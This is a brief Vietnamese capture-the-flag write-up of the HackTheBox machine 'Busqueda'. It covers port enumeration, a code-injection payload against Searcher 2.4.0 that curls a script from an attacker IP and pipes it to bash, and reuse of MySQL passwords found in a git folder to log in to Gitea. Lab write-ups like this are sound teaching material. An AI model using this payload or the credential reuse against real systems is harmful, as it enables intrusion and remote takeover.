Busqueda là một máy windows trong Open Beta Season của HackTheBox.
Enumeration
Zenmap:
Server mở port 22, 80 và có domain là searcher.htb, thêm chúng vào file hosts.
Liệt kê website, tôi thấy đây là một website Searcher version 2.4.0, tìm kiếm các vuln về nó tôi tìm thấy: Arbitrary Code Execution
Từ đó tôi thiết lập payload như sau:
Payload: "http://127.0.0.1/debug' eval(compile('for x in range(1):\n import os\n os.system("curl http://10.10.**.**/shell|bash")','a','single'))"
Tôi tìm thấy git bên trong folder web, kiểm tra nó:
Kiểm tra file system-checkup.py
Tại đây tôi có được thông tin pass của mysql thử các pass này với gitea cho user administrator.